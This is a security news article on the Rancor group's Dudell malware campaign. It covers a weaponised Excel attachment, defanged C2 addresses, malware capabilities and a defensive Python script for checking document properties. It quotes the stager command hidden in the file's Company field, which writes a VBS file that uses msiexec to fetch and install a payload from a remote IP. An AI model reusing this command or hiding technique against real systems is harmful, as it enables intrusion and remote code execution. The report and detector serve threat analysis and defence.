Custom Malware

Researchers have discovered a new wave of a custom malware campaign, named “Dudell”, from a previously unknown cyberespionage group dubbed Rancor.

The Rancor threat group has been active since 2017 and continuously targeted government organizations through January 2019; in this latest campaign, researchers discovered a previously undocumented custom malware.

Additionally, the group uses another malware family called “Derusbi” to load a secondary payload once it has infiltrated a target, and the malware is installed on the victim’s machine over two rounds of attack.

Researchers observed that the attacker delivered either Derusbi or KHRat samples via 149.28.156[.]61, using either cswksfwq.kfesv[.]xyz or connect.bafunpda[.]xyz as the C2.

Rancor has a record of conducting targeted attacks in Southeast Asia throughout 2017 and 2018.

DUDELL Malware Infection Process

DUDELL malware was initially observed in a weaponized Microsoft Excel document delivered as a malspam email attachment.

Once a victim opens the attachment and clicks “Enable Content”, a malicious macro is triggered and runs on the victim’s machine.

During this process, the macro locates and executes the following data stored in the Company field of the document’s properties:

cmd /c set /p=Set v=CreateObject(^"Wscript.Shell^"):v.Run ^"msiexec /q /i http://199.247.6[.]253/ud^",false,0 <nul > C:\Windows\System32\spool\drivers\color\tmp.vbs

The C2 server IP is visible in this data, and the script downloads the second-stage payload using the Microsoft tool msiexec.
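The stager above lives in the document metadata rather than in the macro body, so a defender can triage the Excel file without executing anything. The following script is an added example (not code from the article or from the Rancor research it summarizes): it opens an OOXML package, reads the Company value from docProps/app.xml, and applies a few heuristics for the pattern described above (a cmd /c launcher, a WScript.Shell object, an msiexec install from a remote URL, and a script written under a Windows path). The sample document is constructed in memory, and the indicator names and thresholds are the example's own assumptions.

```python
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

# Namespace used by docProps/app.xml (extended properties) in OOXML packages.
APP_NS = "http://schemas.openxmlformats.org/officeDocument/2006/extended-properties"

# Heuristic indicators for a stager hidden in a document property.
# Names and regexes are this example's assumptions, modelled on the command in the article.
INDICATORS = {
    "cmd_interpreter": re.compile(r"\bcmd(?:\.exe)?\s+/c\b", re.I),
    "wscript_shell": re.compile(r'createobject\s*\(\s*\^?"?wscript\.shell', re.I),
    "msiexec_remote_install": re.compile(r'\bmsiexec(?:\.exe)?\b[^\n]*?/i\s+\^?"?https?://', re.I),
    "script_dropped_to_disk": re.compile(r'>\s*[A-Za-z]:\\[^\s"]+\.(?:vbs|js|ps1|bat)\b', re.I),
}

# Constructed sample: the command the article attributes to the Company field (IP defanged as on the page).
SAMPLE_STAGER = (
    r'cmd /c set /p=Set v=CreateObject(^"Wscript.Shell^"):v.Run ^"msiexec /q /i http://199.247.6[.]253/ud^",false,0 '
    r'<nul > C:\Windows\System32\spool\drivers\color\tmp.vbs'
)


def read_company_property(xlsx_bytes):
    """Return the <Company> text from docProps/app.xml, or '' if the part or element is absent."""
    with zipfile.ZipFile(io.BytesIO(xlsx_bytes)) as zf:
        if "docProps/app.xml" not in zf.namelist():
            return ""
        root = ET.fromstring(zf.read("docProps/app.xml"))
    node = root.find(f"{{{APP_NS}}}Company")
    return (node.text or "") if node is not None else ""


def triage_company_field(text):
    """Match the indicators against a property value and pull out the remote URL and drop path."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    url = re.search(r'https?://[^\s"^]+', text)
    drop = re.search(r'>\s*([A-Za-z]:\\[^\s"]+)', text)
    return {
        "indicators": hits,
        "remote_url": url.group(0) if url else None,
        "drop_path": drop.group(1) if drop else None,
        # Two independent indicators are required before the file is flagged (assumed threshold).
        "suspicious": len(hits) >= 2,
    }


def build_sample_xlsx(company):
    """Build a minimal constructed package containing only the extended-properties part."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(
            "[Content_Types].xml",
            "<Types xmlns='http://schemas.openxmlformats.org/package/2006/content-types'/>",
        )
        zf.writestr(
            "docProps/app.xml",
            f"<Properties xmlns='{APP_NS}'><Application>Microsoft Excel</Application>"
            f"<Company>{escape(company)}</Company></Properties>",
        )
    return buf.getvalue()


if __name__ == "__main__":
    for label, company in (("stager", SAMPLE_STAGER), ("benign", "Example Corp")):
        doc = build_sample_xlsx(company)
        print(label, triage_company_field(read_company_property(doc)))
```

The same check applies to .docx and .pptx packages, which carry the identical docProps/app.xml part; extending it to the other string properties (Title, Subject, Comments in docProps/core.xml) is a one-line change, since any of them can hold a command that a macro later reads back.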

Researchers from Palo Alto Networks said, “we discovered a similar VBS script used by the Rancor actors that might give us some clues on what the contents of tmp.vbs would resemble. File office.vbs”

Another export function, DllInstall, was observed in this campaign; it is responsible for the core behavior of the malware.

Once executed, the malware creates a hidden window and applies filters in an attempt to evade sandbox analysis, then sends victim information such as hostname, IP address and language pack, along with other operating system information.

Malware also has the following capabilities:

  • Terminate a specific process
  • Enumerate processes
  • Upload file
  • Download file
  • Delete file
  • List folder contents
  • Enumerate storage volumes
  • Execute a command
  • Reverse shell
  • Take a screenshot

Researchers also observed a VBScript named Chrome.vbs associated with the Rancor group; the script is obfuscated and contains packed data used to infect a target with multiple chained persistent artifacts.


BALAJI is an Editor-in-Chief, Security Researcher, Author & Co-Founder of GBHackers On Security, Ethical Hackers Academy, Cyber Security News.
